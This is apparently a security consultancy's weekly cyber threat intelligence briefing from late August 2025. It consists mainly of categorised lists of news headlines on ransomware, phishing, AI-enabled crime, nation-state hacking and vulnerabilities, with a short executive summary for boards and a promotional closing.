Fraudster stole over $1.5 million from city of Baltimore

Other Social Engineering

If You're Using Microsoft Teams, Beware: Hackers Could Be Targeting Your Company

The Old Ways Are Still the Best for Most Cybercriminals

Scammers Will Try to Trick You Into Filling Out Google Forms. Don’t Fall for It | WIRED

A quick look at sextortion at scale: 1,900 messages and 205 Bitcoin addresses spanning four years

US Sanctions Russian National, Chinese Firm Aiding North Korean IT Workers - SecurityWeek

Children at risk of identity theft and fraud from 'sharenting' - BBC News

LinkedIn's new tools just made it tougher to pad your resume | ZDNET

Fraud, Scams and Financial Crime

Scammers Will Try to Trick You Into Filling Out Google Forms. Don’t Fall for It | WIRED

LinkedIn's new tools just made it tougher to pad your resume | ZDNET

The Rise of BEC Attacks Targeting Government Agencies | Proofpoint US

Fraudster stole over $1.5 million from city of Baltimore

Boards Partner with CISOs to Fight AI Cyber Fraud: Google Report

AI impersonation scams are sky-rocketing in 2025, security experts warn – here’s how to stay safe | TechRadar

Hackers breach fintech firm in attempted $130M bank heist

Bitcoin’s record highs spark a surge in crypto scams | TechRadar

New threat group uses custom tools to hijack search results - Help Net Security

LinkedIn expands company verification, mandates workplace checks for certain roles - Help Net Security

How to reclaim control over your online shopping data - Help Net Security

At Singapore’s anti-fraud convention, even the experts get scammed

Chinese Hackers Game Google to Boost Gambling Sites

New China-aligned crew poisons Windows servers for SEO fraud • The Register

FBI warns seniors are being targeted in three-phase Phantom Hacker scams | Fortra

Artificial Intelligence

AI-Powered Cyber Crime Raises Worldwide Alarm Bells. - IT Security Guru

AI Is Making Cybercrime Easier For Unsophisticated Criminals

Threat Actors Weaponize HexStrike AI to Exploit Citrix Flaws Within a Week of Disclosure

AI brain Hexstrike runs cyberattacks on its own | Cybernews

Hackers are using AI to dissect threat intelligence reports and ‘vibe code’ malware | IT Pro

Cybercriminals Exploit X's Grok AI to Bypass Ad Protections and Spread Malware to Millions

AI impersonation scams are sky-rocketing in 2025, security experts warn – here’s how to stay safe | TechRadar

Vibe coding creates brilliant, insecure apps. There are ways around that.

AI can't stop the sprint to adopt hot tech without security • The Register

Agentic AI: A CISO’s security nightmare in the making? | CSO Online

Exposed LLM Servers Expose Ollama Risks - InfoRiskToday

Here's how ransomware crims are abusing AI tools • The Register

Shadow AI Is Already in Your Stack – and It’s a Growing Threat for MSSPs | MSSP Alert

Winning the AI Arms Race in Financial Services Cybersecurity - Infosecurity Magazine

UAE Cybersecurity Council warns 60 per cent of financial attacks start with stolen credentials

Adversarial AI is coming for your applications | TechRadar

AI-Powered Cybercrime Is Here: Massive Breaches & Dark Web Dumps - Security Boulevard

Is artificial intelligence a friend, foe or frenemy? NIST wants to find out - Nextgov/FCW

AI code assistants improve production of security problems • The Register

File security risks rise as insiders, malware, and AI challenges converge - Help Net Security

'AI shame' is running rampant in the corporate sector—and C-suite leaders are most worried about getting caught, survey says | Fortune

New LinkedIn study reveals the secret that a third of professionals are hiding at work | ZDNET

Warner Bros. Discovery sues Midjourney AI for copying its characters | The Verge

Malware

Lazarus Group Expands Malware Arsenal With PondRAT, ThemeForestRAT, and RemotePE

Cybersecurity experts issue urgent warning amid surge in Stealerium malware attacks | IT Pro

Hook v3 unleashes a shocking arsenal of ransomware overlays, fake banking prompts, spyware functions, and real-time device monitoring | TechRadar

Fake PDF tools spread malware, warns NCSC | Cybernews

TamperedChef infostealer delivered through fraudulent PDF Editor

Cybercriminals Use Fake SEO Sites to Spread TamperedChef Malware via Bogus PDF Editor

Hackers are using fake Zoom or Microsoft Teams invites to spy on all your workplace activity | TechRadar

Silver Fox Exploits Signed Drivers to Deploy ValleyRAT Backdoor - Infosecurity Magazine

Attackers Are Abusing Malicious PDFs: Here's How to Spot Them Early

Russian APT28 Deploys "NotDoor" Outlook Backdoor Against Companies in NATO Countries

File security risks rise as insiders, malware, and AI challenges converge - Help Net Security

Malicious npm Package nodejs-smtp Mimics Nodemailer, Targets Atomic and Exodus Wallets

Unknown miscreants snooping around Sitecore via sample keys • The Register

VirusTotal Finds 44 Undetected SVG Files Used to Deploy Base64-Encoded Phishing Pages

Bots/Botnets

TP-Link warns of botnet infecting routers and targeting Microsoft 365 accounts | Malwarebytes

Mobile

Hook v3 unleashes a shocking arsenal of ransomware overlays, fake banking prompts, spyware functions, and real-time device monitoring | TechRadar

Android drops 120 flaw fixes, two exploited in the wild • The Register

What Android security threats should IT know about? | TechTarget

Apple Reportedly Still Under Pressure to Give UK Government Backdoor iCloud Access - CNET

UK's demand for Apple backdoor may have been broader than previously thought

Hackers can now crash phones and downgrade 5G to 4G networks with a toolkit exploiting unencrypted pre-authentication messages | TechRadar

Google is killing a defining feature for Android phones soon - and there's one reason why | ZDNET

Brokewell Android malware delivered through fake TradingView ads

Denial of Service/DoS/DDoS

Cloudflare blocks largest recorded DDoS attack peaking at 11.5 Tbps

DDoS attacks serve as instruments of political influence and disruption - Help Net Security

DDoSing is big and getting bigger – let's kill it off • The Register

Internet of Things – IoT

Severe Hikvision HikCentral product flaws: What You Need to Know

Connected cars are smart, convenient, and open to cyberattacks - Help Net Security

Cyber Trust Mark certification and how IoT devices will qualify | TechTarget

This Company Turns Dashcams into ‘Virtual CCTV Cameras.’ Then Hackers Got In

Tesla denied having fatal crash data until a hacker found it - Ars Technica

Data Breaches/Leaks

UK government dragged for incomplete security reforms • The Register

Warning issued to Salesforce customers after hackers stole Salesloft Drift data | IT Pro

Salesloft Takes Drift Offline After OAuth Token Theft Hits Hundreds of Organizations

Zscaler, Palo Alto Networks Hacked via Salesloft Drift

JSON Config File Leaks Azure AD Credentials

Security Firms Hit by Salesforce–Salesloft Drift Breach - SecurityWeek

Attackers are turning Salesforce trust into their biggest weapon - Help Net Security

Salesloft Drift attack affects Google Workspace security | Proton

Air France Sued Over ‘Hub-and-Spoke’ Salesforce Cyberattack

Blast Radius of Salesloft Drift Attacks Remains Unclear

Sweden scrambles after ransomware attack puts sensitive worker data at risk

Gmail users warned as hackers gain access to private information

Government needs to go ‘further and faster’ on information security improvements – PublicTechnology

Social Security whistleblower who claims DOGE mishandled Americans' sensitive data resigns from post

'2.5 billion Gmail users at risk'? Entirely false, says Google | ZDNET

Major US delivery company hit in data breach with full names, SSNs and medical info of thousands exposed online | Tom's Guide

Chess.com discloses recent data breach via file transfer app

Texas sues PowerSchool over breach exposing 62M students, 880k Texans

Organised Crime & Criminal Actors

AI Is Making Cybercrime Easier For Unsophisticated Criminals

How to reclaim control over your online shopping data - Help Net Security

The Old Ways Are Still the Best for Most Cybercriminals

Hacker Impatience Can Be a Good Thing

Chinese Hackers Game Google to Boost Gambling Sites

New China-aligned crew poisons Windows servers for SEO fraud • The Register

Call for UK to lead on organised crime | Professional Security Magazine

Microsoft deploys a custom Azure Integrated HSM chip across all servers to combat the $10.2 trillion cybercrime pandemic | TechRadar

Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain

Bitcoin’s record highs spark a surge in crypto scams | TechRadar

A quick look at sextortion at scale: 1,900 messages and 205 Bitcoin addresses spanning four years

Malicious npm Package nodejs-smtp Mimics Nodemailer, Targets Atomic and Exodus Wallets

Venus Protocol Recovers $13.5M in Phishing Attack

Fired ChangeNOW worker wants hackers to pay| Cybernews

Insider Risk and Insider Threats

File security risks rise as insiders, malware, and AI challenges converge - Help Net Security

LinkedIn's new tools just made it tougher to pad your resume | ZDNET

LinkedIn expands company verification, mandates workplace checks for certain roles - Help Net Security

US Sanctions Russian National, Chinese Firm Aiding North Korean IT Workers - SecurityWeek

Insurance

How insurer strategies are evolving in response to the ransomware surge

Cyber insurance faces rate deterioration and reduced organic growth: Swiss Re - Reinsurance News

Supply Chain and Third Parties

Warning issued to Salesforce customers after hackers stole Salesloft Drift data | IT Pro

Supply-chain attack hits Zscaler via Salesloft Drift, leaking customer info

Security Firms Hit by Salesforce–Salesloft Drift Breach - SecurityWeek

Attackers are turning Salesforce trust into their biggest weapon - Help Net Security

Salesloft Drift attack affects Google Workspace security | Proton

Air France Sued Over ‘Hub-and-Spoke’ Salesforce Cyberattack

Blast Radius of Salesloft Drift Attacks Remains Unclear

16 Billion Records Exposed in Supply-Chain Data Breach on Gmail, Apple, Facebook

Cloud/SaaS

If You're Using Microsoft Teams, Beware: Hackers Could Be Targeting Your Company

JSON Config File Leaks Azure AD Credentials

TP-Link warns of botnet infecting routers and targeting Microsoft 365 accounts | Malwarebytes

Phishing Empire Runs Undetected on Google, Cloudflare

Ransomware Group Exploits Hybrid Cloud Gaps, Gains Full Azure Control in Enterprise Attacks - SecurityWeek

Hackers Exploit Microsoft Teams to Taunt Victims and Demand Ransoms

AWS nails Russia's Cozy Bear trying to nick Microsoft creds • The Register

Amazon Dismantles Russian APT 29 Infrastructure Used to Attack Users

Amazon Stops Russian APT29 Watering Hole Attack - Infosecurity Magazine

Microsoft deploys a custom Azure Integrated HSM chip across all servers to combat the $10.2 trillion cybercrime pandemic | TechRadar

Encryption

Apple Reportedly Still Under Pressure to Give UK Government Backdoor iCloud Access - CNET

UK's demand for Apple backdoor may have been broader than previously thought

What Q Day means for your business and how to prepare | TechRadar

UK's Broader Demand for Apple iCloud Backdoor Sparks Encryption Clash

Court documents shed new light on UK-Apple row over user data - BBC News

Linux and Open Source

Linux UDisks daemon Vulnerability Let Attackers Gaining Access to Files Owned by Privileged Users

Passwords, Credential Stuffing & Brute Force Attacks

UAE Cybersecurity Council warns 60 per cent of financial attacks start with stolen credentials

TP-Link warns of botnet infecting routers and targeting Microsoft 365 accounts | Malwarebytes

The Old Ways Are Still the Best for Most Cybercriminals

DocuSign Phishing Scam Mimics Apple Pay Disputes to Steal Data

DocuSign and Apple Pay Phishing Scam Steals User Credentials

'2.5 billion Gmail users at risk'? Entirely false, says Google | ZDNET

No, Google did not warn 2.5 billion Gmail users to reset passwords

Google says Gmail security is “strong and effective” as it denies major breach - Ars Technica

Social Media

LinkedIn expands company verification, mandates workplace checks for certain roles - Help Net Security

LinkedIn's new tools just made it tougher to pad your resume | ZDNET

Children at risk of identity theft and fraud from 'sharenting' - BBC News

Disney to pay $10M to settle claims it collected kids’ data on YouTube

Regulations, Fines and Legislation

UK's Broader Demand for Apple iCloud Backdoor Sparks Encryption Clash

Court documents shed new light on UK-Apple row over user data - BBC News

Security experts weigh in on UK's proposed VPN crackdown - Raconteur

Big Tech Companies in the US Have Been Told Not to Apply the Digital Services Act | WIRED

The House | The cyber security bill must go further to truly protect the UK economy

Why are so many organizations dragging their feet on NIS2 compliance? | TechRadar

Apple Reportedly Still Under Pressure to Give UK Government Backdoor iCloud Access - CNET

UK's demand for Apple backdoor may have been broader than previously thought

Ransomware payments are banned in the public sector: should businesses still pay? | IT Pro

Google Fined $379 Million by French Regulator for Cookie Consent Violations

Google told to pay $425m in privacy lawsuit - BBC News

France fines Google, SHEIN, for undercooked Cookie policies • The Register

UK human rights regulator to argue against police use of live facial recognition | Biometric Update

Cyber Trust Mark certification and how IoT devices will qualify | TechTarget

Congress tosses lifeline to cyber intel sharing, grants • The Register

Models, Frameworks and Standards

The House | The cyber security bill must go further to truly protect the UK economy

Big Tech Companies in the US Have Been Told Not to Apply the Digital Services Act | WIRED

Why are so many organizations dragging their feet on NIS2 compliance? | TechRadar

Cyber Trust Mark certification and how IoT devices will qualify | TechTarget

Is artificial intelligence a friend, foe or frenemy? NIST wants to find out - Nextgov/FCW

NIST revision of SP 800-53 highlights rising stakes in patch, update security | Biometric Update

NIST Enhances Security Controls for Improved Patching

Careers, Working in Cyber and Information Security

How gaming experience can help with a cybersecurity career - Help Net Security

Fintech CISO on How AI is Changing Cybersecurity Skillsets - Infosecurity Magazine

Law Enforcement Action and Take Downs

Ransomware gang takedowns causing explosion of new, smaller groups | The Record from Recorded Future News

Prolific Russian ransomware operator living in California enjoys rare leniency awaiting trial | CyberScoop

Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity

Cyber Warfare and Cyber Espionage

A Playbook for Winning the Cyber War: Part 1: Executive Summary

A Playbook for Winning the Cyber War: Part 2: Evaluating Russia’s Cyber Strategy

A Playbook for Winning the Cyber War: Part 3: Evaluating China’s Cyber Strategy

A Playbook for Winning the Cyber War: Part 4: Evaluating Iran’s Cyber Strategy

A Playbook for Winning the Cyber War: Part 5: Evaluating U.S. Cyber Strategy

A Playbook for Winning the Cyber War: Part 6: Testing U.S. Policy Responses to Destructive Cyberattacks with Wargames

A Playbook for Winning the Cyber War: Part 7: How the United States Can Win

Nation State Actors

State-Sponsored Hackers Behind Majority of Vulnerability Exploits - Infosecurity Magazine

China

A Playbook for Winning the Cyber War: Part 1: Executive Summary

A Playbook for Winning the Cyber War: Part 3: Evaluating China’s Cyber Strategy

State-Sponsored Hackers Behind Majority of Vulnerability Exploits - Infosecurity Magazine

Chinese APT Hackers Exploit Router Vulnerabilities to Infiltrate Enterprise Environments

‘Unrestrained’ Chinese Cyberattackers May Have Stolen Data From Almost Every American - The New York Times

Salt Typhoon APT techniques revealed in new report | CSO Online

US Sanctions Russian National, Chinese Firm Aiding North Korean IT Workers - SecurityWeek

Czech Republic warns of Chinese solar inverter threat - PV Tech

Trump and JD Vance among targets of major Chinese cyberattack, investigators say | Euronews

Chinese Hackers Game Google to Boost Gambling Sites

New China-aligned crew poisons Windows servers for SEO fraud • The Register

US sues robot toy maker for exposing children's data to Chinese devs

Russia

A Playbook for Winning the Cyber War: Part 1: Executive Summary

A Playbook for Winning the Cyber War: Part 2: Evaluating Russia’s Cyber Strategy

State-Sponsored Hackers Behind Majority of Vulnerability Exploits - Infosecurity Magazine

Amazon Dismantles Russian APT 29 Infrastructure Used to Attack Users

APT28 Targets Microsoft Outlook With 'NotDoor' Malware

Russian APT28 Deploys "NotDoor" Outlook Backdoor Against Companies in NATO Countries

NATO takes aim at Russia’s GPS hacking after EU leader’s plane jammed

Sweden says Russia behind surge in GPS jamming over Baltic Sea - BBC News

US Sanctions Russian National, Chinese Firm Aiding North Korean IT Workers - SecurityWeek

AWS nails Russia's Cozy Bear trying to nick Microsoft creds • The Register

Amazon Stops Russian APT29 Watering Hole Attack - Infosecurity Magazine

EU blames Russia as GPS jamming disrupts president’s plane • The Register

US puts $10M bounty on Russians accused of infra attacks • The Register

"Cybersecurity is a common cause": IT Meets in Kyiv discussed how businesses can protect data and reputation | УНН

Iran

A Playbook for Winning the Cyber War: Part 1: Executive Summary

A Playbook for Winning the Cyber War: Part 4: Evaluating Iran’s Cyber Strategy

Iran MOIS Phishes 50+ Embassies, Ministries, Int'l Orgs

North Korea

State-Sponsored Hackers Behind Majority of Vulnerability Exploits - Infosecurity Magazine

Lazarus Group Expands Malware Arsenal With PondRAT, ThemeForestRAT, and RemotePE

US Sanctions Russian National, Chinese Firm Aiding North Korean IT Workers - SecurityWeek

North Korean Hackers Exploit Threat Intel Platforms For Phishing - Infosecurity Magazine

Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence

Internet mapping service Censys reveals state-based abuse • The Register

ICE Revives Contract With Controversial Spyware Firm Paragon

Commercial surveillanceware shrugs off sanctions, regulation • The Register

Tools and Controls

New Dire Wolf Ransomware Attack Windows Systems, Deletes Event Logs and Backup-Related Data

Security experts call for better 'offboarding' practices amid spate of insider attacks by outgoing staff | IT Pro

Security experts weigh in on UK's proposed VPN crackdown - Raconteur

Ransomware Group Exploits Hybrid Cloud Gaps, Gains Full Azure Control in Enterprise Attacks - SecurityWeek

How insurer strategies are evolving in response to the ransomware surge

When Browsers Become the Attack Surface: Rethinking Security for Scattered Spider

Software is 40% of security budgets as CISOs shift to AI defense | VentureBeat

Attackers Abuse Velociraptor Forensic Tool to Deploy Visual Studio Code for C2 Tunneling

BruteForceAI: Free AI-powered login brute force tool - Help Net Security

Security tool bloat Is the new breach vector | TechRadar

Why you should delete your browser extensions right now - or do this to stay safe | ZDNET

Please stop using your ISP's DNS

A spy among us: rethinking cybersecurity in a hybrid world | TechRadar

6 browser-based attacks all security teams should be ready for in 2025

North Korean Hackers Exploit Threat Intel Platforms For Phishing - Infosecurity Magazine

Cyber insurance faces rate deterioration and reduced organic growth: Swiss Re - Reinsurance News

Vibe coding creates brilliant, insecure apps. There are ways around that.

Winning the AI Arms Race in Financial Services Cybersecurity - Infosecurity Magazine

Why one-time security assessments are no longer sufficient [Q&A] - BetaNews

US, Allies Push for SBOMs to Bolster Cybersecurity - SecurityWeek

Threat Hunting Should Be Part of Every Security Program

AI code assistants improve production of security problems • The Register

These 4 antivirus apps are actually worse than malware

Fewer than half of Irish companies automatically back up data, survey shows – The Irish Times

Other News

Security tool bloat Is the new breach vector | TechRadar

Gen Z has a cyber hygiene problem | IT Pro

Traffic to government domains often crosses national borders • The Register

They know where you are: Cybersecurity and the shadow world of geolocation

Fewer than half of Irish companies automatically back up data, survey shows – The Irish Times

"Cybersecurity is a common cause": IT Meets in Kyiv discussed how businesses can protect data and reputation | УНН

Is retail a sitting duck for cybercriminals? | Retail Week

Hackers are also going back to school - major campaign hijacks Google Classroom to hit targets | TechRadar

Why resilience in automotive cybersecurity must stretch beyond data protection - Tech Monitor

Sky Under Siege: Digital Attacks Forcing a New Era in Avionics Cybersecurity - Avionics International

Vulnerability Management

State-Sponsored Hackers Behind Majority of Vulnerability Exploits - Infosecurity Magazine

Why cyber risks lurk in legacy technology | CIO Dive

NIST revision of SP 800-53 highlights rising stakes in patch, update security | Biometric Update

PoC Code in 15 Minutes? AI Turbocharges Exploitation

Enterprises staying on Windows 10 could shell out billions • The Register

Hacked Routers Linger on the Internet for Years

Windows 11 security updates are now unskippable during setup | PCWorld

Cutting through CVE noise with real-world threat signals - Help Net Security

Healthcare Sector Takes 58 Days to Resolve Serious Vulnerabilities - Infosecurity Magazine

AI can help track an ever-growing body of vulnerabilities, CISA official says | CyberScoop

Vulnerabilities

Critical Citrix 0-Day Vulnerability Exploited Since May, Leaving Global Entities Exposed

Hackers Exploit Third-Party SonicWall SSL VPNs to Deploy Sinobi Ransomware: By Parminder Saini

WhatsApp Issues Emergency Update for Zero-Click Exploit Targeting iOS and macOS Devices

CISA Adds TP-Link and WhatsApp Flaws to KEV Catalog Amid Active Exploitation

macOS vulnerability allowed Keychain and iOS app decryption without a password - Help Net Security

Linux UDisks daemon Vulnerability Let Attackers Gaining Access to Files Owned by Privileged Users

Silver Fox Exploits Signed Drivers to Deploy ValleyRAT Backdoor - Infosecurity Magazine

High-Risk SQLi Flaw Exposes WordPress Memberships Plugin Users - Infosecurity Magazine

WordPress Theme Vulnerability Exposes 70K Sites to CSRF, SQL Attacks

WordPress Woes Continue Amid ClickFix, TDS Threats

Paid WordPress users beware - worrying security flaw puts accounts and info at risk | TechRadar

CISA Adds TP-Link and WhatsApp Flaws to KEV Catalog Amid Active Exploitation

Sangoma Patches Critical Zero-Day Exploited to Hack FreePBX Servers - SecurityWeek

Sitecore zero-day vulnerability exploited by attackers (CVE-2025-53690) - Help Net Security

Microsoft says recent Windows updates cause app install issues

Severe Hikvision HikCentral product flaws: What You Need to Know

Enterprise password crew Passwordstate patches auth vuln • The Register

Experts warn of actively exploited FreePBX zero-day

Sector Specific

Industry specific threat intelligence reports are available.

· Automotive

· Construction

· Critical National Infrastructure (CNI)

· Defence & Space

· Education & Academia

· Energy & Utilities

· Estate Agencies

· Financial Services

· FinTech

· Food & Agriculture

· Gaming & Gambling

· Government & Public Sector (including Law Enforcement)

· Health/Medical/Pharma

· Hotels & Hospitality

· Insurance

· Legal

· Manufacturing

· Maritime & Shipping

· Oil, Gas & Mining

· OT, ICS, IIoT, SCADA & Cyber-Physical Systems

· Retail & eCommerce

· Small and Medium Sized Businesses (SMBs)

· Startups

· Telecoms

· Third Sector & Charities

· Transport & Aviation

· Web3

Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.

Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.

You can also follow us on Facebook, Twitter and LinkedIn.

Black Arrow Admin 31/08/2025 Black Arrow Admin 31/08/2025

Black Arrow Cyber Threat Intelligence Briefing 29 August 2025

Black Arrow Cyber Threat Intelligence Briefing 29 August 2025:

-Fake IT Support Attacks Hit Microsoft Teams

-KnowBe4 Report Reveals Global Financial Sector Faces Unprecedented Cyber Threat Surge

-Cyber Moves from Back Office to Boardroom, and Investors Are Paying Attention

-CISOs Evolve from Guardians to Strategic Business Architects

-Incident Response Planning Emerges as a Key Cyber Security Control in Reducing Risk: Marsh McLennan

-Insurers May Limit Payments in Cases of Unpatched Vulnerabilities

-Anatsa Android Banking Trojan Now Targeting 830 Financial Apps with 19m Downloads

-The Hidden Threat in Enterprise Security: Why It’s Time to Rethink PDFs

-Infostealers: The Silent Smash-and-Grab Driving Modern Cyber Crime

-New Cyber Threats Emerge as Old Ransomware Groups Collapse

-Ransomware Cyber Attack Virtually Shuts Down Entire US State

-Chinese Threat Actor Salt Typhoon Cyber Spies Breached 80+ Nations, FBI Warns

Executive Summary

Our review of threat intelligence this week reinforces that cyber attackers target employees to get into the organisation’s systems: attacks via Microsoft Teams have come to the fore again, alongside more classic email phishing. We also look at how the C-Suite is addressing the challenge of cyber security, bringing the subject to the Board as a strategic enabler; this includes strengthening the leadership team’s ability to respond to a cyber incident. While many organisations look to their insurance policy as a safety net during an incident, we report on how insurers may limit their payments if they find that the organisation has not maintained sufficient security.

The second half of our review includes details of emerging and developing attacks, from Android banking applications to PDFs and information stealers. Ransomware continues to surge, driven by new attacker groups that formed after others were shut down by law enforcement; recent victims include multiple state agencies in the USA, while we also report that Chinese state-backed attackers are embedding themselves into the critical national infrastructure of countries across the world.

We remain clear that the way to improve your resilience against a cyber incident is to implement a cyber strategy based on an impartial assessment of your specific cyber risks, and to confirm how you will respond to an incident through a rehearsal exercise facilitated by an unbiased independent expert who will help you uncover and address misconceptions. All of this must be underpinned by proportionate governance aligned to a recognised framework or standard. Contact us for a no-obligation discussion on how this can work in your organisation.

Governance, Risk and Compliance

Boards should bear ultimate responsibility for cybersecurity - BetaNews

Cyber moves from back office to boardroom – and investors are paying attention | TechRadar

Financial sector faces surge in cyber threats - BetaNews

Incident response planning emerges as a key cybersecurity control in reducing cyber risk: Marsh McLennan Cyber Risk Intelligence Center report

Tabletop drills cut cyber event likelihood by 13% – report - CIR Magazine

KnowBe4 Report Reveals Global Financial Sector Faces Unprecedented Cyber Threat Surge - IT Security Guru

Cyber Insurers May Limit Payouts for Breaches via Flaws

Personal Liability, Security Big Issues for CISOs

Human risk and Gen AI-driven data loss top CISO concerns - BetaNews

CISOs Evolve from Guardians to Strategic Business Architects

Cyber pros say the buck stops with the board when it comes to security failings | IT Pro

Concealing cyberattacks risks penalties and harms trust - BetaNews

The Biggest Technology Risk to Organizations is Failing to Plan for Cybersecurity Chaos - Security Boulevard

Cyber security response rising up the agenda

How Boards Can Prepare for Increasing Nation-State Cyber Threats

Building Human Firewalls: Key to Combating Cyber Threats

The evolving CISO role: bridging the gap between security and strategy | TechRadar

CIISec: Most Security Professionals Want Stricter Regulations - Infosecurity Magazine

Regulatory compliance: Act now | TechRadar

Cyber Outlook Report Finds Gaps, Outlines Holistic Approach to Protections

5 Practices to Ensure Your Ecosystem Is Cyber-Secure

How CISOs are balancing risk, pressure and board expectations - Help Net Security

Finding connection and resilience as a CISO - Help Net Security

Threats

Ransomware, Extortion and Destructive Attacks

Ransomware attack volumes up nearly three times on 2024 | Computer Weekly

New cyber threats emerge as old ransomware groups collapse

Storm-0501 attacked Azure, demanded payment via Teams • The Register

AI Boosts Ransomware Attacks 70%, Fueling Cybersecurity Arms Race

Cybersecurity company ESET warns AI now being used in ransomware attacks - Business Plus

Criminals Are Vibe Hacking With AI To Carry Out Ransoms At Scale: Anthropic

Ransomware Actor Deletes Data and Backups Post-Exfiltration on Azure - Infosecurity Magazine

Organized and Criminal, Ransomware Gangs Run Up Profits - Security Boulevard

Blue Locker ransomware hits critical infrastructure – is your organisation ready? - Exponential-e Blog

First AI-powered ransomware PoC spotted • The Register

ShadowCaptcha Exploits WordPress Sites to Spread Ransomware, Info Stealers, and Crypto Miners

Hook Android Trojan Delivers Ransomware-Style Attacks

Underground Ransomware Gang With New Tactics Against Organizations Worldwide

Cephalus ransomware: What you need to know | Fortra

Emulating the Expedited Warlock Ransomware - Security Boulevard

Experimental PromptLock ransomware uses AI to encrypt, steal data

Someone Created the First AI-Powered Ransomware Using OpenAI's gpt-oss:20b Model

‘Vibe-hacking’ is now a top AI threat | The Verge

When ransomware hits home: putting your people first | TechRadar

Akira, Cl0p Top "5 Most Active Ransomware Groups" List

AI Meets Ransomware, The New Cyber Threat | Scoop News

Ransomware Gangs Are Bleeding the Healthcare Supply Chain | MSSP Alert

Ransomware Victims

Ransomware cyber attack virtually shuts down US state | The Independent

When One Hospital Gets Ransomware, Others Feel the Pain

Qilin Ransomware Hits Nissan: 4TB of Vehicle Designs Stolen

Electronics manufacturer Data I/O took offline operational systems following a ransomware attack

Data I/O ransomware attack ‘temporarily impacted’ operations • The Register

Phishing & Email Based Attacks

'ZipLine' Phishers Flip Script as Victims Email First

Fake IT Support Attacks Hit Microsoft Teams - Infosecurity Magazine

Microsoft urges to limit CLI tools as phishing rages | Cybernews

Fast-Spreading, Complex Phishing Campaign Installs RATs

Phishing Campaign Uses UpCrypter in Fake Voicemail Emails to Deliver RAT Payloads

Off-the-shelf tools make life easier for phishing attackers - BetaNews

New Phishing Campaign Abuses ConnectWise ScreenConnect to Take Over De - Infosecurity Magazine

Hackers Exploit Linux RAR Flaws in Phishing to Deploy VShell Backdoor

Compromised at the Core: Why Identity Remains Cyber’s Biggest Flaw | SC Media UK

Google Breach Exposes 2.5 Billion Gmail Accounts to Phishing Attacks

Transparent Tribe Targets Indian Govt With Weaponized Desktop Shortcuts via Phishing

What small businesses must do now to stay ahead of phishing | SC Media

Other Social Engineering

Fake IT Support Attacks Hit Microsoft Teams - Infosecurity Magazine

Fake CAPTCHA tests trick users into running malware • The Register

How social engineering is the weakest link in cyber defence

New Attack Tricks AI Summaries Into Pushing Malware

Phishing Campaign Uses UpCrypter in Fake Voicemail Emails to Deliver RAT Payloads

Fake Apple Support Sites Spread Malware Evading macOS Defenses

What is SIM swap attack (SIM intercept attack)? | Definition from TechTarget

Attackers exploit Zoom and Teams impersonations to deliver ScreenConnect malware - SiliconANGLE

Treasury sanctions North Korea IT worker scheme facilitators and front organizations | CyberScoop

Can We Really Eliminate Human Error in Cybersecurity? - Security Boulevard

ScreenConnect admins targeted with spoofed login alerts - Help Net Security

Crooks are getting ready for FIFA World Cup 2026 | Cybernews

Fraud, Scams and Financial Crime

Operation Serengeti 2.0: INTERPOL nabs 1,209 cybercriminals in Africa, seizes $97M

iPhone Users 20% More Likely to Fall for Scams Than Android, Study Shows

ScamAgent shows how AI could power the next wave of scam calls - Help Net Security

bne IntelliNews - Cyber criminals steal $339mn from thousands of victims in Zambia, Angola and Ivory Coast

Dangerous Android banking trojan found lurking in malicious apps with 19 million installs — don’t fall for this | Tom's Guide

Anatsa Android Banking Trojan Now Targeting 830 Financial Apps - SecurityWeek

Crypto Companies Freeze $47m in Romance Baiting Funds - Infosecurity Magazine

Crooks are getting ready for FIFA World Cup 2026 | Cybernews

FCC removes 1,200 voice providers from telephone networks in major robocall crackdown | CyberScoop

69% of Consumers Believe AI Fraud Is the Biggest Identity Threat | Security Magazine

Artificial Intelligence

New Attack Tricks AI Summaries Into Pushing Malware

AI Boosts Ransomware Attacks 70%, Fueling Cybersecurity Arms Race

Criminals Are Vibe Hacking With AI To Carry Out Ransoms At Scale: Anthropic

Human risk and Gen AI-driven data loss top CISO concerns - BetaNews

New research finds AI agents exploiting valid credentials to bypass traditional security controls in enterprises | TechRadar

Agentic AI coding assistant helped attacker breach, extort 17 distinct organizations - Help Net Security

ScamAgent shows how AI could power the next wave of scam calls - Help Net Security

Cybersecurity company ESET warns AI now being used in ransomware attacks - Business Plus

Experimental PromptLock ransomware uses AI to encrypt, steal data

‘Vibe-hacking’ is now a top AI threat | The Verge

Rowhammer attack can backdoor AI models with one devastating bit flip | CSO Online

AI Security Map: Linking AI vulnerabilities to real-world impact - Help Net Security

Anthropic Warns of ‘Sophisticated’ Cybercrime Via Claude LLM

LLMs Face Persistent Prompt Injection Vulnerabilities

We Are Still Unable to Secure LLMs from Malicious Inputs - Security Boulevard

Detecting and countering misuse of AI: August 2025 \ Anthropic

Hundreds of Salesforce customers impacted by attack spree linked to third-party AI agent | CyberScoop

1,000+ Devs Lose Their Secrets to an AI-Powered Stealer

69% of Consumers Believe AI Fraud Is the Biggest Identity Threat | Security Magazine

The 5 Golden Rules of Safe AI Adoption

The do’s and don’ts of vibe coding - Fast Company

Researchers warn of security flaws in AI-powered browsers | TechSpot

Anthropic thwarts hacker attempts to misuse Claude AI for cybercrime | Reuters

OpenAI increases ChatGPT user protections following wrongful death lawsuit | ZDNET

Malware

New Attack Tricks AI Summaries Into Pushing Malware

Fake CAPTCHA tests trick users into running malware • The Register

Infostealers: The Silent Smash-and-Grab Driving Modern Cybercrime - SecurityWeek

Phishing Campaign Uses UpCrypter in Fake Voicemail Emails to Deliver RAT Payloads

Fake Apple Support Sites Spread Malware Evading macOS Defenses

Attackers exploit Zoom and Teams impersonations to deliver ScreenConnect malware - SiliconANGLE

Fast-Spreading, Complex Phishing Campaign Installs RATs

ShadowCaptcha Exploits WordPress Sites to Spread Ransomware, Info Stealers, and Crypto Miners

Over 300 entities hit by a variant of Atomic macOS Stealer in recent campaign

Macs under attack from dangerous new info-stealing malware — how to stay safe | Tom's Guide

Fake macOS Help Sites Seek to Spread Infostealer in Targeted Campaign - Infosecurity Magazine

Chinese Developer Jailed for Deploying Malicious Code at US Company - Infosecurity Magazine

The hidden threat in enterprise security: why it’s time to rethink PDFs | TechRadar

